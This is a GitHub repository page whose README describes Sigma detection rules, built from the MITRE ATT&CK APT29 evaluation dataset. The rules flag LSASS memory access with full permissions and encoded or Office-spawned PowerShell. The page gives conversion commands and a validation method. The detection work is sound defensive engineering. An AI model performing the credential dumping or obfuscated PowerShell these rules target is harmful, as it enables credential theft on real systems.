Skip to content

Manishrawat21/Detection-Rules

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
Suspicious_Lsass_Process
Suspicious_Lsass_Process
 
 
Suspicious_Powershell_Commands
Suspicious_Powershell_Commands
 
 
README.md
README.md
 
 

Repository files navigation

APT29 Detection Engineering

Production-ready Sigma detection rules developed from analysis of 196,071 Sysmon events in the MITRE ATT&CK Evaluations APT29 dataset.

Overview

This repository contains validated detection rules for adversary behaviors observed during APT29 simulation. Each rule was tested against the actual attack data, converted to Splunk SPL, and validated for false positives.

Analysis published at: Detection Desk

Detection Coverage

MITRE Technique Rule Name Severity Status
T1003.001 LSASS Process Access with Full Permissions High Tested
T1059.001, T1027 Suspicious PowerShell Execution Patterns High Tested

Rules

Credential Access

LSASS Process Access with Full Permissions

  • Detects: PowerShell or cmd.exe accessing lsass.exe with GrantedAccess 0x1fffff
  • MITRE: T1003.001 (Credential Dumping)
  • Validated Against: APT29 credential dumping at 23:05:16, ProcessID 3852
  • False Positives: Low (security tools, antivirus)

Splunk Query: View SPL

Execution

Suspicious PowerShell Execution Patterns

  • Detects: PowerShell with encoding, Office-spawned PowerShell with evasion or network activity
  • MITRE: T1059.001 (PowerShell), T1027 (Obfuscation), T1566.001 (Phishing)
  • Validated Against: APT29 dataset EventID 1 PowerShell executions
  • False Positives: Medium (legitimate automation, software deployment)

Splunk Query: View SPL

Usage

Convert to Splunk

sigma convert -t splunk -p sysmon https://github.com/Manishrawat21/SOC_Dectection_Rules/blob/main/Suspicious_Powershell_Commands/Detection_Rule.yaml

Convert to Elastic

sigma convert -t elasticsearch -p sysmon https://github.com/Manishrawat21/SOC_Dectection_Rules/blob/main/Suspicious_Powershell_Commands/Detection_Rule.yaml

Test in Your Environment

  1. Deploy to SIEM test environment
  2. Monitor for 7 days
  3. Document false positives
  4. Add exclusions as needed
  5. Promote to production

Validation Methodology

Each rule was tested using:

  • MITRE ATT&CK Evaluations APT29 dataset (196,071 events)
  • Splunk Free Tier with Sysmon logs
  • ProcessID and ProcessGuid correlation
  • Network traffic validation
  • Parent-child process tree analysis

About This Project

I analyzed the complete APT29 attack simulation to understand how advanced persistent threats operate in real environments. The goal was to write detection rules that catch actual adversary behavior, not theoretical attacks.

Analysis series:

Contributing

These rules are shared for the security community. If you:

  • Find false positives in your environment
  • Improve detection logic
  • Add conversions for other SIEMs

Submit a pull request or open an issue.

Author

Manish Rawat

Detection Engineer | Threat Hunter | CompTIA Security+ & CEH Certified

License

MIT License - Use freely, attribution appreciated# SOC_Dectection_Rules Written some detection rules to catch some abnormal activites. These are writen after my APT29 detection series, I hope these works for as they did for myself.

About

This repository contains validated detection rules for adversary behaviors observed during APT29 simulation. Each rule was tested against the actual attack data, converted to Splunk SPL, and validated for false positives.

Topics

splunk sysmon threat-hunting soc powershell-attack mitre-attack threat-detection apt29 sigma-rules lsass-dump

Resources

Readme
Activity

Stars

2 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors 1